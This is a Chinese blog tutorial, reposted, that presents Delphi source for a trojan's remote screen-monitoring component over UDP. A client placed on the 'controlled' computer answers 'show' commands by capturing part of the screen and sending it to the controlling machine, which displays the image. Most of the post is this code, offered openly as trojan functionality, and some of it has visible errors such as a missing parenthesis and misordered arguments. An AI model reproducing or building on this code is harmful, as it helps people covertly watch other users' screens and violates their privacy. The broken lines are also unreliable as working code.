用UDP协议的木马编写方法

导读:
  木马的一个很重要的功能就是远程监视屏幕,下面的文章讲述了怎样利用UDP协议来实现,而不是我们通常用到的tcp/ip协议,很有特色,值得一学。
   一、软硬件要求
  Windows对等网,用来监视的计算机(以下简称主控机)和被监视的计算机(以下简称受控机)都必须装有TCP/IP 协议,并正确配置。如没有网络,也可以在一台计算机上进行调试。
   二、实现方法
  编制两个应用程序,一个为VClient.exe,装在受控机上,另一个为 VServer.exe,装在主控机上。VServer.exe指定要监视的受控机的IP地址和将要在受控机屏幕上抓取区域的大小和位置,并发出屏幕抓取 指令给VClient.exe,VClient.exe得到指令后,在受控机屏幕上选取指定区域,生成数据流,将其发回主控机,并在主控机上显示出抓取区 域的BMP图象。由以上过程可以看出,该方法的关键有二:一是如何在受控机上进行屏幕抓取,二是如何通过TCP/IP协议在两台计算机中传输数据。
  UDP(User Datagram Protocol,意为用户报文协议)是Internet上广泛采用的通信协议之一。与TCP协议不同,它是一种非连接的传输协议,没有确认机制,可*性 不如TCP,但它的效率却比TCP高,用于远程屏幕监视还是比较适合的。同时,UDP控件不区分服务器端和客户端,只区分发送端和接收端,编程上较为简 单,故选用UDP协议,使用Delphi 4.0提供的TNMUDP控件。
   三、创建演示程序
  第一步,编制VClient.exe文件。新建Delphi工程,将默认窗体的 Name属性设为“Client”。加入TNMUDP控件,Name属性设为“CUDP”;LocalPort属性设为“1111”,让控件CUDP监视 受控机的1111端口,当有数据发送到该口时,触发控件CUDP的OnDataReceived事件;RemotePort属性设为“2222”,当控件 CUDP发送数据时,将数据发到主控机的2222口。在implementation后面加入变量定义
  const BufSize=2048;{ 发送每一笔数据的缓冲区大小 }
  var
  BmpStream:TMemoryStream;
  LeftSize:Longint;{ 发送每一笔数据后剩余的字节数 }
  为Client的OnCreate事件添加代码:
  procedure TClient.FormCreate(Sender: TObject);
  begin
  BmpStream:=TMemoryStream.Create;
  end;
  为Client的OnDestroy事件添加代码:
  procedure TClient.FormDestroy(Sender: TObject);
  begin
  BmpStream.Free;
  end;
  为控件CUDP的OnDataReceived事件添加代码:
  procedure TClient.CUDPDataReceived(Sender: TComponent;
  NumberBytes: Integer; FromIP: String);
  var
  CtrlCode:array[0..29] of char;
  Buf:array[0..BufSize-1] of char;
  TmpStr:string;
  SendSize,LeftPos,TopPos,RightPos,BottomPos:integer;
  begin
  CUDP.ReadBuffer(CtrlCode,NumberBytes);{ 读取控制码 }
  if CtrlCode[0]+CtrlCode[1]+CtrlCode[2]+CtrlCode[3]=’show’ then
  begin { 控制码前4位为“show”表示主控机发出了抓屏指令 }
  if BmpStream.Size=0 then { 没有数据可发,必须截屏生成数据 }
  begin
  TmpStr:=StrPas(CtrlCode);
  TmpStr:=Copy(TmpStr,5,Length(TmpStr)-4);
  LeftPos:=StrToInt(Copy(TmpStr,1,Pos(’:’,TmpStr)-1));
  TmpStr:=Copy(TmpStr,Pos(’:’,TmpStr)+1,Length(TmpStr) -Pos(’:’,TmpStr));
  TopPos:=StrToInt(Copy(TmpStr,1,Pos(’:’,TmpStr)-1));
  TmpStr:=Copy(TmpStr,Pos(’:’,TmpStr)+1,Length(TmpStr)-Pos(’:’,TmpStr));
  RightPos:=StrToInt(Copy(TmpStr,1,Pos(’:’,TmpStr)-1));
  BottomPos:=StrToInt(Copy(TmpStr,Pos(’:’,TmpStr)+1,Length(TmpStr)-Pos’:’,TmpStr)));
  ScreenCap(LeftPos,TopPos,RightPos,BottomPos); { 截取屏幕 }
  end;
  if LeftSize>BufSize then SendSize:=BufSize
  else SendSize:=LeftSize;
  BmpStream.ReadBuffer(Buf,SendSize);
  LeftSize:=LeftSize-SendSize;
  if LeftSize=0 then BmpStream.Clear;{ 清空流 }
  CUDP.RemoteHost:=FromIP; { FromIP为主控机IP地址 }
  CUDP.SendBuffer(Buf,SendSize); { 将数据发到主控机的2222口 }
  end;
  end;
  其中ScreenCap是自定义函数,截取屏幕指定区域,代码如下:
  procedure TClient.ScreenCap(LeftPos,TopPos,
  RightPos,BottomPos:integer);
  var
  RectWidth,RectHeight:integer;
  SourceDC,DestDC,Bhandle:integer;
  Bitmap:TBitmap;
  begin
  RectWidth:=RightPos-LeftPos;
  RectHeight:=BottomPos-TopPos;
  SourceDC:=CreateDC(’DISPLAY’,’’,’’,nil);
  DestDC:=CreateCompatibleDC(SourceDC);
  Bhandle:=CreateCompatibleBitmap(SourceDC,
  RectWidth,RectHeight);
  SelectObject(DestDC,Bhandle);
  BitBlt(DestDC,0,0,RectWidth,RectHeight,SourceDC,
  LeftPos,TopPos,SRCCOPY);
  Bitmap:=TBitmap.Create;
  Bitmap.Handle:=BHandle;
  BitMap.SaveToStream(BmpStream);
  BmpStream.Position:=0;
  LeftSize:=BmpStream.Size;
  Bitmap.Free;
  DeleteDC(DestDC);
  ReleaseDC(Bhandle,SourceDC);
  end;
  存为“C:/VClient/ClnUnit.pas”和“C:/VClient/VClient.dpr”,并编译。
  第二步,编制VServer.exe文件。
  新建Delphi工程,将窗体的Name属性设为“Server”。加入 TNMUDP控件,Name属性设为“SUDP”;LocalPort属性设为“2222”,让控件SUDP监视主控机的2222端口,当有数据发送到该 口时,触发控件SUDP的OnDataReceived事件;RemotePort属性设为“1111”,当控件SUDP发送数据时,将数据发到受控机的 1111口。加入控件Image1,Align属性设为“alClient”;加入控件Button1,Caption属性设为“截屏”;加入控件 Label1,Caption属性设为“左:上:右:下”;加入控件Edit1,Text属性设为“0:0:100:100”;加入控件Label2, Caption属性设为“受控机IP地址”;加入控件Edit2,Text属性设为“127.0.0.1”;
  在implementation后面加入变量定义
  const BufSize=2048;
  var
  RsltStream,TmpStream:TMemoryStream;
  为Server的OnCreate事件添加代码:
  procedure TServer.FormCreate(Sender: TObject);
  begin
  RsltStream:=TMemoryStream.Create;
  TmpStream:=TMemoryStream.Create;
  end;
  为Client的OnDestroy事件添加代码:
  procedure TServer.FormDestroy(Sender: TObject);
  begin
  RsltStream.Free;
  TmpStream.Free;
  end;
  为控件Button1的onClick事件添加代码:
  procedure TServer.Button1Click(Sender: TObject);
  var ReqCode:array[0..29] of char;ReqCodeStr:string;
  begin
  ReqCodeStr:=’show’+Edit1.Text;
  StrpCopy(ReqCode,ReqCodeStr);
  TmpStream.Clear;
  RsltStream.Clear;
  SUDP.RemoteHost:=Edit2.Text;
  SUDP.SendBuffer(ReqCode,30);
  end;
  为控件SUDP的OnDataReceived事件添加代码:
  procedure TServer.SUDPDataReceived(Sender: TComponent;
  NumberBytes: Integer; FromIP: String);
  var ReqCode:array[0..29] of char;ReqCodeStr:string;
  begin
  ReqCodeStr:=’show’+Edit1.text;
  StrpCopy(ReqCode,ReqCodeStr);
  SUDP.ReadStream(TmpStream);
  RsltStream.CopyFrom(TmpStream,NumberBytes);
  if NumberBytes< BufSize then { 数据已读完 }
  begin
  RsltStream.Position:=0;
  Image1.Picture.Bitmap.LoadFromStream(RsltStream);
  TmpStream.Clear;
  RsltStream.Clear;
  end
  else
  begin
  TmpStream.Clear;
  ReqCode:=’show’;
  SUDP.RemoteHost:=Edit2.Text;
  SUDP.SendBuffer(ReqCode,30);
  end;
  end;
  存为“C:/VServer/SvrUnit.pas”和“C:/VServer/VServer.dpr”,并编译。
   四、测试
  1、本地机测试:在本地机同时运行Vserver.exe和VClient.exe,利用程序的默认设置,即可实现截屏。查看“控制面板”-“网络”-“TCP/IP”-“IP地址”,将程序的“客户IP地址”设为该地址 ,同样正常运行。
  (完)

本文转自
http://hi.baidu.com/lufa2014/blog/item/2e5bb544d492d84d510ffeb0.html
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值